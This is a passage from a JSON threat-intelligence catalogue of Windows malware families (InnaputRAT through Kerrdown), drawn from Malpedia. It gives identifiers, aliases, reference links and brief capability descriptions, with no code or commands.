"synonyms": [], "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", "value": "InnaputRAT" }, { "description": "InnifiRAT is coded in .NET and targets personal data on infected devices, with it's top priority appearing to be bitcoin and litecoin wallet data.\r\n\r\nInffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.\r\n\r\nIt attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality. \r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat", "https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more" ], "synonyms": [], "type": [] }, "uuid": "b6aec7a7-7ebc-4aad-bcdf-1c3cb7044e3c", "value": "win.innfirat" }, { "description": "ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception", "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" ], "synonyms": [], "type": [] }, "uuid": "fa022849-248c-4620-86b4-2a36c704b288", "value": "Interception" }, { "description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" ], "synonyms": [], "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironcat", "https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/", "https://twitter.com/demonslay335/status/1308827693312548864" ], "synonyms": [], "type": [] }, "uuid": "c6fc8419-afb1-4e99-a6cf-4288ead2381b", "value": "Ironcat" }, { "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [], "type": [] }, "uuid": "44599616-3849-4960-9379-05307287ff80", "value": "IRONHALO" }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy", "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://lokalhost.pl/gozi_tree.txt", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://www.cyberbit.com/new-ursnif-malware-variant/", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/", "http://benkow.cc/DreambotSAS19.pdf", "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "https://blog.talosintelligence.com/2020/07/valak-emerges.html", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/", "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/", "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", "https://www.tgsoft.it/files/report/download.asp?id=568531345", "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://github.com/mlodic/ursnif_beacon_decryptor", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass" ], "synonyms": [ "Gozi ISFB", "IAP", "Pandemyia" ], "type": [] }, "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", "value": "ISFB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", "http://www.clearskysec.com/ismagent/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] }, "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", "value": "ISMAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", "http://www.clearskysec.com/greenbug/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", "value": "ISMDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", "https://www.zscaler.com/blogs/research/ispy-keylogger", "https://www.secureworks.com/research/threat-profiles/gold-skyline" ], "synonyms": [], "type": [] }, "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", "https://twitter.com/malwrhunterteam/status/1085162243795369984" ], "synonyms": [], "type": [] }, "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a", "value": "IsraBye" }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" ], "synonyms": [], "type": [] }, "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", "value": "ISR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf", "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "NfLog RAT" ], "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", "value": "IsSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware", "https://fr3d.hk/blog/ixware-kids-will-be-skids" ], "synonyms": [], "type": [] }, "uuid": "5710dffa-ec02-4e5c-848e-47af13f729d7", "value": "IXWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos" ], "synonyms": [], "type": [] }, "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", "value": "JackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] }, "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", "value": "Jaff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" ], "synonyms": [], "type": [] }, "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", "value": "Jager Decryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ "C3PRO-RACOON", "KCNA Infostealer", "Reconcyc" ], "type": [] }, "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, { "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://marcoramilli.com/2019/06/06/apt34-jason-project/", "https://twitter.com/P3pperP0tts/status/1135503765287657472", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "e101a605-c30f-4222-9549-4745d0d769cd", "value": "jason" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, { "description": "Ransomware written in Go.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry", "https://twitter.com/IdoNaor1/status/1101936940297924608", "https://twitter.com/0xffff0800/status/1102078898320302080" ], "synonyms": [], "type": [] }, "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", "value": "JCry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno", "https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html" ], "synonyms": [ "Jest", "Valeria" ], "type": [] }, "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f", "value": "Jeno Ransomware" }, { "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat", "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", "https://blog.talosintelligence.com/2020/01/jhonerat.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "6dd8c953-f500-46dd-bacf-78772222f011", "value": "JhoneRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" ], "synonyms": [], "type": [] }, "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", "value": "Jigsaw" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [], "type": [] }, "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", "value": "Jimmy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" ], "synonyms": [], "type": [] }, "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", "value": "Joanap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" ], "synonyms": [], "type": [] }, "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", "value": "Joao" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" ], "synonyms": [], "type": [] }, "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", "value": "Jolob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", "http://marcmaiffret.com/vault7/" ], "synonyms": [], "type": [] }, "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", "value": "JQJSNICKER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf" ], "synonyms": [], "type": [] }, "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", "value": "JripBot" }, { "description": "JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox", "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", "https://twitter.com/zlab_team/status/1208022180241530882", "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese" ], "synonyms": [], "type": [] }, "uuid": "5e4fbe90-c043-4ac3-9fd5-d9e7d9bb173f", "value": "JSOutProx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader", "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf" ], "synonyms": [], "type": [] }, "uuid": "5db89188-568d-40d2-9320-5fb4a06fbd51", "value": "JSSLoader" }, { "description": "As described on the Github repository page, \"A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato", "https://github.com/ohpe/juicy-potato", "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf" ], "synonyms": [], "type": [] }, "uuid": "4dc0dccf-ac68-4464-b193-6519ffe00617", "value": "JuicyPotato" }, { "description": "According to FireEye, JUMPALL is a malware dropper that has been observed \r\ndropping HIGHNOON/ZXSHELL/SOGU.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "a08db33d-4c37-4075-bd49-c3ab66a339db", "value": "JUMPALL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter", "https://redcanary.com/blog/yellow-cockatoo/", "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" ], "synonyms": [], "type": [] }, "uuid": "5b834445-4437-46a6-9d4d-673ecf4bf1b9", "value": "Jupyter Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", "value": "KAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", "https://www.secureworks.com/research/threat-profiles/iron-liberty", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" ], "synonyms": [ "Karagny" ], "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", "value": "Karagany" }, { "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" ], "synonyms": [], "type": [] }, "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", "value": "Kardon Loader" }, { "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", "https://research.checkpoint.com/banking-trojans-development/", "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" ], "synonyms": [], "type": [] }, "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/", "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/" ], "synonyms": [ "CACTUSPIPE", "MailDropper" ], "type": [] }, "uuid": "a45c16d9-6945-428c-af46-0436903f9329", "value": "Karkoff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", "value": "KasperAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "https://www.epicturla.com/blog/sysinturla", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/", "https://securelist.com/sunburst-backdoor-kazuar/99981/" ], "synonyms": [], "type": [] }, "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", "value": "Kazuar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] }, "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", "value": "Kegotip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw", "https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html" ], "synonyms": [ "KEKW-Locker" ], "type": [] }, "uuid": "b178de96-14a3-49f1-a957-c83f86e23e83", "value": "KEKW Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], "type": [] }, "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf", "https://blog.cystack.net/word-based-malware-attack/", "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", 